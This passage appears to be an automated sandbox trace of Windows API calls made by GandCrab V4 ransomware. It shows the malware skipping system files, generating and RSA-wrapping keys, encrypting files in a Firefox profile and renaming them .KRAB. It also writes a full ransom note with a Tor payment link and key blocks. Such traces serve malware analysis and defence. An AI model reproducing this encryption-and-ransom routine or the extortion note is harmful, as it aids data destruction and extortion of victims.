(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0083.996] lstrlenW (lpString=".metadata-v2") returned 12 [0083.996] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.996] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".metadata-v2 ") returned 13 [0083.996] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.997] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0083.997] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned 130 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="desktop.ini") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="autorun.inf") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="iconcache.db") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="bootsect.bak") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="boot.ini") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntuser.dat.log") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="thumbs.db") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.html") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="KRAB-DECRYPT.txt") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="CRAB-DECRYPT.txt") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="ntldr") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="NTDETECT.COM") returned -1 [0083.997] lstrcmpiW (lpString1=".metadata-v2", lpString2="Bootfont.bin") returned -1 [0083.997] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.998] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10108a8) returned 1 [0083.999] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.999] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.000] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.000] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0084.000] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0084.000] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.000] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10114e0) returned 1 [0084.002] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.002] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.002] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.002] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0084.002] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0084.002] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.003] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010df8) returned 1 [0084.004] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023338) returned 1 [0084.004] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0084.004] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0084.005] GetLastError () returned 0x0 [0084.005] CryptDestroyKey (hKey=0x1023338) returned 1 [0084.005] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0084.005] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010ce8) returned 1 [0084.006] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1022ff8) returned 1 [0084.006] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0084.006] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0084.007] GetLastError () returned 0x0 [0084.007] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.007] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0084.007] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7dc [0084.008] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0084.009] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0084.009] ReadFile (in: hFile=0x7dc, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x3b, lpOverlapped=0x0) returned 1 [0084.029] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xffffffc5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.029] WriteFile (in: hFile=0x7dc, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x3b, lpOverlapped=0x0) returned 1 [0084.029] WriteFile (in: hFile=0x7dc, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0084.030] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.036] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.036] CloseHandle (hObject=0x7dc) returned 1 [0084.037] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.037] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.krab")) returned 1 [0084.038] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.038] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0084.038] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0084.039] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0084.039] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock" [0084.039] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.039] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 146 [0084.040] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock") returned 141 [0084.040] lstrlenW (lpString=".lock") returned 5 [0084.040] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.040] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0084.040] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.041] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.042] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0084.042] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0084.042] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0084.042] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" [0084.042] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\" [0084.042] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0084.043] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.043] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.043] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.044] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.044] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.044] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.045] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\\\KRAB-DECRYPT.txt") returned 139 [0084.045] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7dc [0084.058] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0084.058] WriteFile (in: hFile=0x7dc, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338dba0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338dba0*=0x1f6e, lpOverlapped=0x0) returned 1 [0084.059] CloseHandle (hObject=0x7dc) returned 1 [0084.059] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.060] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.061] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1f, wMilliseconds=0x106)) [0084.061] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.061] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.061] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.061] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock") returned 145 [0084.061] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x7dc [0084.062] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.063] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.063] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\") returned 122 [0084.063] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*" [0084.063] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 0x1023338 [0084.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.063] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0084.063] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.063] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.064] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0084.064] lstrcmpW (lpString1="818200132aebmoouht.files", lpString2=".") returned 1 [0084.064] lstrcmpW (lpString1="818200132aebmoouht.files", lpString2="..") returned 1 [0084.064] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0084.064] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\" [0084.064] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0084.064] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.064] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.064] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.064] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.064] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.065] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.065] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\\\KRAB-DECRYPT.txt") returned 164 [0084.065] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 